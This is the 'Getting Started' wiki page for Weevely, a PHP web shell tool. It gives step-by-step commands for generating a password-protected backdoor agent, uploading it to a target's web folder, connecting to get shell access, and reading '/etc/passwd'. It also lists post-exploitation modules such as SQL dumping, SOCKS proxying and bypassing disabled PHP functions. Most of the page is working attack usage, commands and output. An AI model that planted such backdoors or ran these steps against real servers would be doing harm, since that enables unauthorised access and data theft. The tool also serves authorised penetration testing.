-
Notifications
You must be signed in to change notification settings - Fork 605
Getting Started
Weevely client communicates to the PHP agent installed into the target. Move to the weevely3/
folder and run ./weevely.py
to print the help screen.
$ ./weevely.py
[+] weevely 4.0.0
[!] Error: too few arguments
[+] Run terminal to the target
weevely <URL> <password>
[+] Load session file
weevely session <path>
[+] Generate backdoor agent
weevely generate <password> <path>
To generate a new agent, just use the generate
option passing the password and path arguments.
$ ./weevely.py generate mypassword agent.php
Generated backdoor with password 'mypassword' in 'agent.php' of 671 byte size.
Upload the generated agent under the target web folder. Make sure that the agent URL is reachable from your position, and it correcly executed by the web server as PHP code.
Launch weevely script to connect to the remote agent.
$ ./weevely.py http://target/agent.php mypassword
weevely>
The first prompt weevely>
isn't connected yet to allow the user to set the options or print help.
weevely> :set proxy <type>://<host>:<port>
weevely> :help
Type a first command to establish the shell access to the target.
weevely> uname -a
Linux ubuntu 3.2.0-65-generic 99-Ubuntu SMP Fri Jul 4 21:04:27 UTC 2014 i686 i686 i386 GNU/Linux
www-data@target:/var/ $ cat /etc/passwd
root:*:0:0:System Administrator:/var/root:/bin/sh
Type :
and double tab command to list the modules.
www-data@target:/var/ $ :<TAB>
audit_disablefunctionbypass cp file_gzip gunzip net_scan sql_dump
audit_etcpasswd curl file_ls gzip net_socksproxy system_extensions
...
Prepend a :
to run a module.
www-data@target:/var/ $ :audit_suidsgid --help
usage: audit_suidsgid [-h] [-only-suid] [-only-sgid] rpath
Find files with SUID or SGID flags.
positional arguments:
rpath Remote starting path
optional arguments:
...
If the target PHP settings don't allow to execute external commands, Weevely uses PHP>
prompt and emulates commands such as cd
, cat
, curl
, nano
in order to provide a functional shell access to the server.